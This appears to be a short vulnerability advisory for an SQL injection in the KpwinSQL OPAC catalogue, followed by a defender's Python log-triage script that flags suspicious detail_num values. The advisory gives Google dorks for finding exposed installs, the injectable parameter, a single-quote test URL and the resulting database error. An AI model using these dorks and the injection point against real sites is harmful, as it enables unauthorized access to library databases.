OPAC KpwinSQL - SQL Injection

2016.06.25
Credit: bRpsd
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Product -> OPAC KpwinSQL - SQL Injection
Date -> 6/24/2016
Author -> bRpsd
Skype: vegnox
Vendor HomePage -> http://www.kpsys.cz/
Product Download -> http://www.kpsys.cz/kpwinsql/demo.html
Product Version -> / All
SQL Version -> Firebird 1.5.3
OS -> Win98SE, Me, NT, 2000, XP, 2003, Vista
Dork -> intitle:"WWW OPAC KpwinSQL"
Dork2 -> inurl:zaznam.php?detail_num=
Dork3 -> inurl:opacsql2_0
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

File: zaznam.php
Parameter: detail_num
Test > http://localhost:8888/zaznam.php?detail_num=1'

Response:
24-06-2016 08:52:21: localhost: CHYBA: 2 WARNING: ibase_query(): Dynamic SQL Error SQL error code = -104 Unexpected end of command - line 1, column 40 :In: "C:wwwopacfunctions.php" (Line: 5462) : URL:"/zaznam.php?detail_num=1%27"Pri zpracovani pozadavku doslo k chybe, omlouvame se .
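
For defenders running this product, a log triage sketch follows. It is an added example, not part of the original advisory or the vendor's code. It assumes the application writes errors to a log in the same layout as the response quoted above, and it flags ibase_query SQL errors where detail_num is not a plain integer. The names triage, ERROR_LINE and SAMPLE_LOG are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Layout of the error line quoted in the advisory's "Response" field.
# Assumption: the application logs errors in this same layout.
ERROR_LINE = re.compile(
    r'^(?P<ts>\d{2}-\d{2}-\d{4} \d{2}:\d{2}:\d{2}): (?P<host>[^:]+): CHYBA: .*?'
    r'ibase_query\(\): Dynamic SQL Error SQL error code = (?P<code>-?\d+)'
    r'.*?URL:"(?P<url>[^"]*)"'
)

def triage(lines, param="detail_num"):
    """Return one finding per SQL error line whose `param` is not a plain integer."""
    findings = []
    for line in lines:
        m = ERROR_LINE.match(line)
        if not m:
            continue  # not an ibase_query SQL error in this layout
        # parse_qs URL-decodes values, so %27 becomes a literal single quote.
        query = parse_qs(urlsplit(m["url"]).query, keep_blank_values=True)
        for value in query.get(param, []):
            # A record id should be digits only; anything else on an
            # SQL error line deserves review.
            if not re.fullmatch(r"[0-9]+", value):
                findings.append({"ts": m["ts"], "host": m["host"],
                                 "sql_code": int(m["code"]), "value": value})
    return findings

# Sample input: line 1 is the response quoted in the advisory,
# lines 2 and 3 are constructed for this example.
SAMPLE_LOG = [
    '24-06-2016 08:52:21: localhost: CHYBA: 2 WARNING: ibase_query(): Dynamic SQL Error '
    'SQL error code = -104 Unexpected end of command - line 1, column 40 :In: '
    '"C:wwwopacfunctions.php" (Line: 5462) : URL:"/zaznam.php?detail_num=1%27"',
    '24-06-2016 09:10:02: localhost: CHYBA: 2 WARNING: ibase_query(): Dynamic SQL Error '
    'SQL error code = -204 Table unknown :In: "C:wwwopacfunctions.php" (Line: 5462) : '
    'URL:"/zaznam.php?detail_num=15"',
    '24-06-2016 09:11:40: localhost: INFO: search completed URL:"/index.php?q=kniha"',
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_LOG):
        print(finding)
```

Only the first sample line is reported: the second has a numeric detail_num and the third is not an SQL error.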

